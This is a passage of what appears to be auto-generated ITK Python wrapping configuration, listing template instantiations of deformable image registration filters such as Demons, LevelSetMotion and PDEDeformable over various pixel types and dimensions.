char,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUC3IUC3IVF33', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUC2IUC2IVF42', True, 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUC3IUC3IVF43', True, 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUS2IUS2IVF22', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUS3IUS3IVF23', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUS2IUS2IVF32', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUS3IUS3IVF33', True, 
'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUS2IUS2IVF42', True, 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIUS3IUS3IVF43', True, 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIF2IF2IVF22', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >,2 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIF3IF3IVF23', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,2 >,3 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIF2IF2IVF32', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,3 >,2 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIF3IF3IVF33', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >,3 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIF2IF2IVF42', True, 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,4 >,2 >'),\n ('SymmetricForcesDemonsRegistrationFilter', 'itk::SymmetricForcesDemonsRegistrationFilter', 'itkSymmetricForcesDemonsRegistrationFilterIF3IF3IVF43', True, 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,4 >,3 >'),\n)\nsnake_case_functions = ('level_set_motion_registration_filter', 'pde_deformable_registration_filter', 'symmetric_forces_demons_registration_filter', 'demons_registration_filter', 'multi_resolution_pde_deformable_registration', )\n",
"depends = 'ITKPyBase', 'ITKRegistrationCommon', 'ITKFiniteDifference'\ntemplates = ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterISS2ISS2IVF22', True,\n 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterISS3ISS3IVF23', True,\n 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterISS2ISS2IVF32', True,\n 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterISS3ISS3IVF33', True,\n 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterISS2ISS2IVF42', True,\n 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterISS3ISS3IVF43', True,\n 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIUC2IUC2IVF22', True,\n 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIUC3IUC3IVF23', True,\n 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIUC2IUC2IVF32', True,\n 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIUC3IUC3IVF33', True,\n 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIUC2IUC2IVF42', True,\n 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIUC3IUC3IVF43', True,\n 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIUS2IUS2IVF22', True,\n 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIUS3IUS3IVF23', True,\n 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIUS2IUS2IVF32', True,\n 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIUS3IUS3IVF33', True,\n 
'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIUS2IUS2IVF42', True,\n 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIUS3IUS3IVF43', True,\n 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIF2IF2IVF22', True,\n 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIF3IF3IVF23', True,\n 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIF2IF2IVF32', True,\n 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIF3IF3IVF33', True,\n 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIF2IF2IVF42', True,\n 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('DemonsRegistrationFilter', 'itk::DemonsRegistrationFilter',\n 'itkDemonsRegistrationFilterIF3IF3IVF43', True,\n 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterISS2ISS2IVF22', True,\n 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterISS3ISS3IVF23', True,\n 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterISS2ISS2IVF32', True,\n 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterISS3ISS3IVF33', True,\n 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterISS2ISS2IVF42', True,\n 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterISS3ISS3IVF43', True,\n 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIUC2IUC2IVF22', True,\n 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), 
('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIUC3IUC3IVF23', True,\n 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIUC2IUC2IVF32', True,\n 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIUC3IUC3IVF33', True,\n 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIUC2IUC2IVF42', True,\n 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIUC3IUC3IVF43', True,\n 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIUS2IUS2IVF22', True,\n 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIUS3IUS3IVF23', True,\n 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIUS2IUS2IVF32', True,\n 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIUS3IUS3IVF33', True,\n 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIUS2IUS2IVF42', True,\n 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIUS3IUS3IVF43', True,\n 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIF2IF2IVF22', True,\n 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIF3IF3IVF23', True,\n 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIF2IF2IVF32', True,\n 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 
'itkLevelSetMotionRegistrationFilterIF3IF3IVF33', True,\n 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIF2IF2IVF42', True,\n 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('LevelSetMotionRegistrationFilter',\n 'itk::LevelSetMotionRegistrationFilter',\n 'itkLevelSetMotionRegistrationFilterIF3IF3IVF43', True,\n 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('MultiResolutionPDEDeformableRegistration',\n 'itk::MultiResolutionPDEDeformableRegistration',\n 'itkMultiResolutionPDEDeformableRegistrationIF2IF2IVF22F', True,\n 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >, 2 >, float'\n ), ('MultiResolutionPDEDeformableRegistration',\n 'itk::MultiResolutionPDEDeformableRegistration',\n 'itkMultiResolutionPDEDeformableRegistrationIF3IF3IVF33F', True,\n 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >, 3 >, float'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterISS2ISS2IVF22', True,\n 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterISS3ISS3IVF23', True,\n 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterISS2ISS2IVF32', True,\n 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterISS3ISS3IVF33', True,\n 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterISS2ISS2IVF42', True,\n 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterISS3ISS3IVF43', True,\n 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIUC2IUC2IVF22', True,\n 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIUC3IUC3IVF23', True,\n 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIUC2IUC2IVF32', True,\n 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIUC3IUC3IVF33', True,\n 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 
>, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIUC2IUC2IVF42', True,\n 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIUC3IUC3IVF43', True,\n 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIUS2IUS2IVF22', True,\n 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIUS3IUS3IVF23', True,\n 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIUS2IUS2IVF32', True,\n 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIUS3IUS3IVF33', True,\n 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIUS2IUS2IVF42', True,\n 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIUS3IUS3IVF43', True,\n 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIF2IF2IVF22', True,\n 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIF3IF3IVF23', True,\n 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIF2IF2IVF32', True,\n 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIF3IF3IVF33', True,\n 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIF2IF2IVF42', True,\n 'itk::Image< float,2 >, itk::Image< float,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('PDEDeformableRegistrationFilter',\n 'itk::PDEDeformableRegistrationFilter',\n 'itkPDEDeformableRegistrationFilterIF3IF3IVF43', True,\n 'itk::Image< float,3 >, itk::Image< float,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 
'itkSymmetricForcesDemonsRegistrationFilterISS2ISS2IVF22', True,\n 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterISS3ISS3IVF23', True,\n 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterISS2ISS2IVF32', True,\n 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterISS3ISS3IVF33', True,\n 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterISS2ISS2IVF42', True,\n 'itk::Image< signed short,2 >, itk::Image< signed short,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterISS3ISS3IVF43', True,\n 'itk::Image< signed short,3 >, itk::Image< signed short,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIUC2IUC2IVF22', True,\n 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIUC3IUC3IVF23', True,\n 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIUC2IUC2IVF32', True,\n 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIUC3IUC3IVF33', True,\n 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIUC2IUC2IVF42', True,\n 'itk::Image< unsigned char,2 >, itk::Image< unsigned char,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIUC3IUC3IVF43', True,\n 'itk::Image< unsigned char,3 >, itk::Image< unsigned char,3 >, itk::Image< itk::Vector< float,4 >,3 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIUS2IUS2IVF22', True,\n 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,2 >,2 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 
'itkSymmetricForcesDemonsRegistrationFilterIUS3IUS3IVF23', True,\n 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,2 >,3 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIUS2IUS2IVF32', True,\n 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,3 >,2 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIUS3IUS3IVF33', True,\n 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,3 >,3 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIUS2IUS2IVF42', True,\n 'itk::Image< unsigned short,2 >, itk::Image< unsigned short,2 >, itk::Image< itk::Vector< float,4 >,2 >'\n ), ('SymmetricForcesDemonsRegistrationFilter',\n 'itk::SymmetricForcesDemonsRegistrationFilter',\n 'itkSymmetricForcesDemonsRegistrationFilterIUS3IUS3IVF43', True,\n 'itk::Image< unsigned short,3 >, itk::Image< unsigned short,3 >, itk::Image< itk::Vector< float,4 